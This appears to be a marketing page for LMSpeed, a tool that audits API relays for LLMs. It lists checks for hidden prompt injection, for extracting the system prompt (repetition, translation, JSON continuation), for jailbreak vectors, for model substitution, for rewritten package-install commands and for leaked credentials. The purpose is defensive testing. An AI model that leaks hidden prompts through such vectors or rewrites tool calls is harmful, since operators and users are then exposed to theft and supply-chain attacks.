Step 1-2
Infrastructure reconnaissance
DNS, CDN, SSL certificates, admin-panel fingerprints, and model-list enumeration establish the relay's technical stack.
Check whether your API relay swaps, injects, or leaks data
Paste an OpenAI-compatible endpoint, API key, and model ID. LMSpeed runs supply-chain security probes and returns a redacted shareable report.
- Steps
- 11
- Risk surfaces
- 9
- Output
- Redacted report
More than a speed test: inspect whether the relay path was tampered with
lmspeed puts model identity, prompt leakage, context boundaries, error leakage, and stream integrity into one security comparison table, so you can baseline a relay before wiring it into production.
| Dimension | lmspeed | hvoy.ai | cctest.ai |
|---|---|---|---|
| Token injectionCompare actual token usage with the expected count | Covered | Not covered | Covered |
| Prompt extractionProbe hidden system prompt leakage | Covered | Not covered | Not covered |
| Identity substitutionDetect whether Claude is actually answered by another model | Covered | Covered | Not covered |
| Jailbreak defenseCheck common jailbreak vectors | Covered | Not covered | Not covered |
| Context truncationFind the real context-window boundary | Covered | Not covered | Not covered |
| Tool-call rewrite (AC-1.a)Detect rewritten package commands and tool arguments | Covered | Not covered | Not covered |
| Error response leakage (AC-2)Probe credentials, paths, and internal field leakage | Covered | Not covered | Not covered |
| Stream integrity (SSE)Validate event types, usage, and thinking signatures | Covered | Covered | Not covered |
| Web3 injectionCheck whether signing context is polluted by the relay layer | Covered | Not covered | Not covered |
| Channel fingerprintProtobuf signatures and multimodal interpretation checks | In designSoon | Not covered | Covered |
CoveredCoveredNot coveredNot coveredIn designSoonIn design
How the 11-step audit breaks down relay risk
Each check keeps public evidence redacted: you can see where the path looks suspicious without publishing API keys, system prompts, or internal paths.
Threat categories are based on Liu et al., "Your Agent Is Mine" (arXiv:2604.08407)
Step 3
Token injection (AC-1)
Compare actual token usage with expected usage. Hidden system prompt injection adds extra tokens, and the delta can reveal the injection size.
Step 4 & 6
Prompt extraction
Try three vectors to extract hidden system prompts: direct repetition, translation, and JSON continuation, plus jailbreak-defense checks.
Step 5
Identity substitution
Use 24 keywords to detect whether Claude is actually GPT, DeepSeek, GLM, Qwen, or another model, then confirm with anchor phrases.
Step 7
Context truncation
Five canary markers plus binary search locate the real context-window boundary. Does your 200K context really hold 200K?
Step 8 (AC-1.a)
Tool-call rewrite
Detect whether the relay rewrites package-install commands on the return path, a proxy-layer typosquatting supply-chain attack.
Step 9 (AC-2)
Error response leakage
Send seven intentionally malformed requests to see whether API keys, environment variables, file paths, or LiteLLM internals leak through errors.
Step 10-11
Stream integrity & Web3
Validate the SSE event allowlist, usage monotonicity, thinking-signature validity, and model identity, then add profile-gated Web3 signing-isolation probes.